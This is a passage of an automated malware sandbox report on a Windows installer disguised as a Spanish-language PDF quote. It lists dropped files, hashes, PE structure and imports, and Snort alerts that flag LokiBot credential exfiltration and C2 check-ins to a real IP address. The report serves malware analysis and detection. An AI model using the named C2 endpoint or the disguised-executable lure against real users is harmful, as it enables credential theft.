                  SHA-512:F51B719361C96B2D638E35C489ABEA9F752B3B4E1DC432709C3A4687C30FA3A04DE6061FE0A0E097103F9E6D0E918D5EB4B8FD36B7C574131A49C3805740600B
                  Malicious:false
                  Reputation:low
                  Preview: ..ul.....E`..."..:...E@.c.........j`s...9Fj.5......q.......!...@.......e&.xh...LQ.k...'.v.1?.9...1......of._6.^@.._..).[.o[h......F..,.N+> ..VI.',.(p[.'.h(..~1._^6..vn;...Qqt...4G.7....R.th.6~....,.y9.>4x.g...(...N...hv.......m.BU.?...Z9%..u..R......7G.....:...m......}....j` ...FjO56......F.......v.@.aF.....gu...3..:....Sh.*......9..#....BZd"..s.@.._..)j).........`...1.ib.,Y2y...7..h....G...{..-.5..ICLD..\....I.Q.....g_S.o....Y...D...L<..%.VC.,...L{w0.a.........B..D...Z9%..u,..O...`..7C.....&.@.....|....-j`s...9Fj.5......#5.m.....a.@E/F...P.2..........RS.N*[.X....9.....BV......s.@.._..)j)........`...1.ib.,Y2y...7..h....G...{..-.5..ICLD..\....I.Q.....g_7-o....Y...D...L<..%.VC.,...L..hv...B......B......Z9%..u,..O...`..."..:...E@.c.........j`s...9Fj.5......q..........@.aF....Pgu..........RShN*......9..#....BV......s.@.._..)j).........`...1.ib.,Y2y...7..h....G...{..-.5..ICLD..\....I.Q.....g_7-o....Y...D...L<..%.VC.,...L
                  C:\Users\user\AppData\Local\Temp\tmdvzsircx
                  Process:C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4976
                  Entropy (8bit):6.161968435503816
                  Encrypted:false
                  SSDEEP:96:dz0p9Vb7mSf8rAzp/mFJjRaXeHxKzQDwgim9Nv1SC0ip1/zIE449tUUlGT7c571N:dz0pDDD4yeHxK0Dym9/tE8U3Tw571SUT
                  MD5:D83B3DB2850820DCF18D511826E05844
                  SHA1:8FEF008C0EEA3C1BCFF29446455C9FFF1F79D9A6
                  SHA-256:AD07B4AA8FBB3811E21582695F487F4A5A8E4908F28C7A2127698AF298A607AD
                  SHA-512:31D4FE9453BAEF8F72070384CB69985C267A5A0B530576EA270A628DDDD69406732FC782ED63868A5AB0F39E7ADFD1C2449FBD3FBFE30B9CBB6056A81B87AAAD
                  Malicious:false
                  Reputation:low
                  Preview: .&..<...Sb96.....6.."l..6.."l......l.K........\..\#.l.c......l..<..\..\#.l.c......l.<..\..\#.l.c......l.<..\..\#.l.c......l.<..#.Y=m+;....l...l.<..l#...B.l..d.l..d....B.m#`...l..<....l.69......mB.......7,.J...\.`.\.].\.X;.\.X`.\.n.\.q..#.k...k.O.3...\..\.X].l+.,.l..........W7.2.....7$..qn.l.nq:..t...<..hh.6.."l.l+...l..3.l+...d#.'.<.W...l..l+..S.d+...l.<...t........[.........'..........._....+..$_z..g....M....+.<...K.6.."l..l.#....l..l........l.....l.S.l..l.k.l....',....i.l+.m+`....W$..g$.l..m+`....W$..g$.m.m+;....W,.c.........c......l....l.c.\+.M....l......).....&.l......l...t...<...S.6.."l..l.K....l.l........l.....l.S.l..l.k.l....r............l+.m+`....W$.g$.l..m+`....W$.g$.l#.m+`...W$.g$.l'B.m+]....W..O..l..m+`....W$.g$.m,m+;....W,.c.........c......l......+.l..d......\..\'.\#.\..\+......l......).....&.l......l...t.'.<.....l.#....l..l........l.....l.S.l..l.k.l....m.....i.l+.m+`....W$..g$..l..m+`....W$..g$.m.m+;....W,.c.$_z..F...c.7....l..!.\
                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                  Process:C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                  Process:C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):47
                  Entropy (8bit):1.168829563685559
                  Encrypted:false
                  SSDEEP:3:/lSll2DQi:AoMi
                  MD5:DAB633BEBCCE13575989DCFA4E2203D6
                  SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                  SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                  SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ........................................user.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.863769051552967
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 92.16%
                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Cotizaci#U00f3npdf.exe
                  File size:251901
                  MD5:3fe29e21698212a70e03144bb4979632
                  SHA1:b400de247096542b778aa7ed7584f6829b5bbf4e
                  SHA256:c42005e0a00c3ecbaff6c1189ca8b6f1298a818878ceaebb623585c399c8ba81
                  SHA512:a37080b42f317bcaf288acc2ede4fd178bf8227a6f0650b61378e829458fb26808f6fb64250e32bb737f583ddb75264c1fde488e31ceb57d7890005f04ab723d
                  SSDEEP:6144:/wCNuC+dh+Q6PTM9599ohs4o358eJr6NxGD:ruN+QMTMVpP80AA
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                  File Icon

                  Icon Hash:1c188bca1b2d565b

                  Static PE Info

                  General

                  Entrypoint:0x403225
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:099c0646ea7282d232219f8807883be0

                  Entrypoint Preview

                  Instruction
                  sub esp, 00000180h
                  push ebx
                  push ebp
                  push esi
                  xor ebx, ebx
                  push edi
                  mov dword ptr [esp+18h], ebx
                  mov dword ptr [esp+10h], 00409128h
                  xor esi, esi
                  mov byte ptr [esp+14h], 00000020h
                  call dword ptr [00407030h]
                  push 00008001h
                  call dword ptr [004070B4h]
                  push ebx
                  call dword ptr [0040727Ch]
                  push 00000008h
                  mov dword ptr [00423F58h], eax
                  call 00007FE928B0F4F0h
                  mov dword ptr [00423EA4h], eax
                  push ebx
                  lea eax, dword ptr [esp+34h]
                  push 00000160h
                  push eax
                  push ebx
                  push 0041F450h
                  call dword ptr [00407158h]
                  push 004091B0h
                  push 004236A0h
                  call 00007FE928B0F1A7h
                  call dword ptr [004070B0h]
                  mov edi, 00429000h
                  push eax
                  push edi
                  call 00007FE928B0F195h
                  push ebx
                  call dword ptr [0040710Ch]
                  cmp byte ptr [00429000h], 00000022h
                  mov dword ptr [00423EA0h], eax
                  mov eax, edi
                  jne 00007FE928B0C9BCh
                  mov byte ptr [esp+14h], 00000022h
                  mov eax, 00429001h
                  push dword ptr [esp+14h]
                  push eax
                  call 00007FE928B0EC88h
                  push eax
                  call dword ptr [0040721Ch]
                  mov dword ptr [esp+1Ch], eax
                  jmp 00007FE928B0CA15h
                  cmp cl, 00000020h
                  jne 00007FE928B0C9B8h
                  inc eax
                  cmp byte ptr [eax], 00000020h
                  je 00007FE928B0C9ACh
                  cmp byte ptr [eax], 00000022h
                  mov byte ptr [eax+eax+00h], 00000000h

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x4148.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0x2c0000x41480x4200False0.441169507576data5.0955746829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x2c1f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
                  RT_ICON0x2e7980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294374645, next used block 4294967295EnglishUnited States
                  RT_ICON0x2f8400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                  RT_DIALOG0x2fca80x100dataEnglishUnited States
                  RT_DIALOG0x2fda80x11cdataEnglishUnited States
                  RT_DIALOG0x2fec80x60dataEnglishUnited States
                  RT_GROUP_ICON0x2ff280x30dataEnglishUnited States
                  RT_MANIFEST0x2ff580x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                  Imports

                  DLLImport
                  KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                  SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  01/14/22-17:28:13.315745TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14975480192.168.2.5104.223.93.105
                  01/14/22-17:28:13.315745TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.5104.223.93.105
                  01/14/22-17:28:13.315745TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.5104.223.93.105
                  01/14/22-17:28:14.966908TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14975580192.168.2.5104.223.93.105
                  01/14/22-17:28:14.966908TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.5104.223.93.105
                  01/14/22-17:28:14.966908TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.5104.223.93.105
                  01/14/22-17:28:16.603027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.5104.223.93.105
                  01/14/22-17:28:16.603027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.5104.223.93.105
                  01/14/22-17:28:16.603027TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.5104.223.93.105
                  01/14/22-17:28:18.954071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.5104.223.93.105
                  01/14/22-17:28:18.954071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.5104.223.93.105
                  01/14/22-17:28:18.954071TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.5104.223.93.105
                  01/14/22-17:28:21.450628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.5104.223.93.105
                  01/14/22-17:28:21.450628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.5104.223.93.105
                  01/14/22-17:28:21.450628TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.5104.223.93.105
                  01/14/22-17:28:23.258656TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.5104.223.93.105
                  01/14/22-17:28:23.258656TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.5104.223.93.105
                  01/14/22-17:28:23.258656TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.5104.223.93.105
                  01/14/22-17:28:24.754730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.5104.223.93.105
                  01/14/22-17:28:24.754730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.5104.223.93.105
                  01/14/22-17:28:24.754730TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.5104.223.93.105
                  01/14/22-17:28:26.095199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.5104.223.93.105
                  01/14/22-17:28:26.095199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.5104.223.93.105
                  01/14/22-17:28:26.095199TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.5104.223.93.105
                  01/14/22-17:28:27.825343TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.5104.223.93.105
                  01/14/22-17:28:27.825343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.5104.223.93.105
                  01/14/22-17:28:27.825343TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.5104.223.93.105
                  01/14/22-17:28:29.267836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.5104.223.93.105
                  01/14/22-17:28:29.267836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.5104.223.93.105
                  01/14/22-17:28:29.267836TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.5104.223.93.105
                  01/14/22-17:28:30.598055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.5104.223.93.105
                  01/14/22-17:28:30.598055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.5104.223.93.105
                  01/14/22-17:28:30.598055TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.5104.223.93.105
                  01/14/22-17:28:31.998392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.5104.223.93.105
                  01/14/22-17:28:31.998392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.5104.223.93.105
                  01/14/22-17:28:31.998392TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.5104.223.93.105
                  01/14/22-17:28:35.257565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.5104.223.93.105
                  01/14/22-17:28:35.257565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.5104.223.93.105
                  01/14/22-17:28:35.257565TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.5104.223.93.105
                  01/14/22-17:28:37.734698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.5104.223.93.105
                  01/14/22-17:28:37.734698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.5104.223.93.105
                  01/14/22-17:28:37.734698TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.5104.223.93.105
                  01/14/22-17:28:44.091710TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.5104.223.93.105
                  01/14/22-17:28:44.091710TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.5104.223.93.105
                  01/14/22-17:28:44.091710TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.5104.223.93.105
                  01/14/22-17:28:45.667839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.5104.223.93.105
                  01/14/22-17:28:45.667839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.5104.223.93.105
                  01/14/22-17:28:45.667839TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.5104.223.93.105
                  01/14/22-17:28:47.384707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.5104.223.93.105
                  01/14/22-17:28:47.384707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.5104.223.93.105
                  01/14/22-17:28:47.384707TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.5104.223.93.105
                  01/14/22-17:28:48.947783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.5104.223.93.105
                  01/14/22-17:28:48.947783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.5104.223.93.105
                  01/14/22-17:28:48.947783TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.5104.223.93.105
                  01/14/22-17:28:50.801699TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.5104.223.93.105
                  01/14/22-17:28:50.801699TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.5104.223.93.105
                  01/14/22-17:28:50.801699TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.5104.223.93.105
                  01/14/22-17:28:52.454047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.5104.223.93.105
                  01/14/22-17:28:52.454047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.5104.223.93.105
                  01/14/22-17:28:52.454047TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.5104.223.93.105
                  01/14/22-17:28:54.036242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.5104.223.93.105
                  01/14/22-17:28:54.036242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.5104.223.93.105
                  01/14/22-17:28:54.036242TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.5104.223.93.105
                  01/14/22-17:28:55.470161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.5104.223.93.105
                  01/14/22-17:28:55.470161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.5104.223.93.105
                  01/14/22-17:28:55.470161TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.5104.223.93.105
                  01/14/22-17:28:57.622553TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.5104.223.93.105
                  01/14/22-17:28:57.622553TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.5104.223.93.105
                  01/14/22-17:28:57.622553TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.5104.223.93.105
                  01/14/22-17:28:59.015617TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.5104.223.93.105
                  01/14/22-17:28:59.015617TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.5104.223.93.105
                  01/14/22-17:28:59.015617TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.5104.223.93.105
                  01/14/22-17:29:00.450387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.5104.223.93.105
                  01/14/22-17:29:00.450387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.5104.223.93.105
                  01/14/22-17:29:00.450387TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.5104.223.93.105
                  01/14/22-17:29:01.829359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.5104.223.93.105
                  01/14/22-17:29:01.829359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.5104.223.93.105
                  01/14/22-17:29:01.829359TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.5104.223.93.105
                  01/14/22-17:29:03.362296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.5104.223.93.105
                  01/14/22-17:29:03.362296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.5104.223.93.105
                  01/14/22-17:29:03.362296TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.5104.223.93.105
                  01/14/22-17:29:05.461336TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.5104.223.93.105
                  01/14/22-17:29:05.461336TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.5104.223.93.105
                  01/14/22-17:29:05.461336TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.5104.223.93.105
                  01/14/22-17:29:07.046101TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.5104.223.93.105
                  01/14/22-17:29:07.046101TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.5104.223.93.105
                  01/14/22-17:29:07.046101TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.5104.223.93.105
                  01/14/22-17:29:08.406847TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.5104.223.93.105
                  01/14/22-17:29:08.406847TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.5104.223.93.105
                  01/14/22-17:29:08.406847TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.5104.223.93.105
                  01/14/22-17:29:11.296373TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.5104.223.93.105
                  01/14/22-17:29:11.296373TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.5104.223.93.105
                  01/14/22-17:29:11.296373TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.5104.223.93.105
                  01/14/22-17:29:14.185843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.5104.223.93.105
                  01/14/22-17:29:14.185843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.5104.223.93.105
                  01/14/22-17:29:14.185843TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.5104.223.93.105
                  01/14/22-17:29:16.911808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.5104.223.93.105
                  01/14/22-17:29:16.911808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.5104.223.93.105
                  01/14/22-17:29:16.911808TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.5104.223.93.105
                  01/14/22-17:29:18.692195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.5104.223.93.105
                  01/14/22-17:29:18.692195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.5104.223.93.105
                  01/14/22-17:29:18.692195TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.5104.223.93.105
                  01/14/22-17:29:23.575058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.5104.223.93.105
                  01/14/22-17:29:23.575058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.5104.223.93.105
                  01/14/22-17:29:23.575058TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.5104.223.93.105
                  01/14/22-17:29:25.832127TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.5104.223.93.105
                  01/14/22-17:29:25.832127TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.5104.223.93.105
                  01/14/22-17:29:25.832127TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.5104.223.93.105
                  01/14/22-17:29:27.728216TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.5104.223.93.105
                  01/14/22-17:29:27.728216TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.5104.223.93.105
                  01/14/22-17:29:27.728216TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.5104.223.93.105
                  01/14/22-17:29:30.416868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.5104.223.93.105
                  01/14/22-17:29:30.416868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.5104.223.93.105
                  01/14/22-17:29:30.416868TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.5104.223.93.105
                  01/14/22-17:29:33.215695TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.5104.223.93.105
                  01/14/22-17:29:33.215695TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.5104.223.93.105
                  01/14/22-17:29:33.215695TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.5104.223.93.105
                  01/14/22-17:29:34.891024TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.5104.223.93.105
                  01/14/22-17:29:34.891024TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.5104.223.93.105
                  01/14/22-17:29:34.891024TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.5104.223.93.105
